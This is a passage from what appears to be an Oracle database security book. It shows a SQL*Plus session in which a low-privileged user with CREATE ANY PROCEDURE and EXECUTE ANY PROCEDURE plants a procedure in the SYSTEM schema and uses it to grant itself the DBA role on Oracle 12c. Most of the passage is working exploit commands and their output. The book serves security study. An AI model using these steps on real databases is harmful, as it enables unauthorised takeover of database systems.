Database Reference
In-Depth Information
Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production With the Partitioning,
OLAP, Advanced Analytics and Real Application Testing options
SQL> create user systest identified by lowsec;
User created.
SQL> grant create session, create any procedure, execute any procedure to systest;
Grant succeeded.
SQL> conn systest/lowsec@192.168.56.101/orcl
SQL> create or replace procedure system.get_dba
2 as
3 begin
4 execute immediate 'grant dba to systest';
5 end;
6 /
Procedure created.
SQL> begin
2 system.get_dba;
3 end;
4 /
PL/SQL procedure successfully completed.
SQL> set role dba;
Role set.
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_ COM
-------- ------------ --- --- --- ---
SYSTEST DBA NO YES NO NO
SQL> select * from v$version;
BANNER CON_ID
---------------------------------------------------------------------------- ------
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production 0
PL/SQL Release 12.1.0.1.0 - Production 0
CORE 12.1.0.1.0 Production 0
TNS for Linux: Version 12.1.0.1.0 - Production
The 12c exploit shown here does require
EXECUTE ANY PROCEDURE
and
CREATE ANY PROCEDURE
, which are higher
privileges than my 11g exploit from the previous chapter. So a default install of 12c is currently more secure than one
of 11g, but not by much.
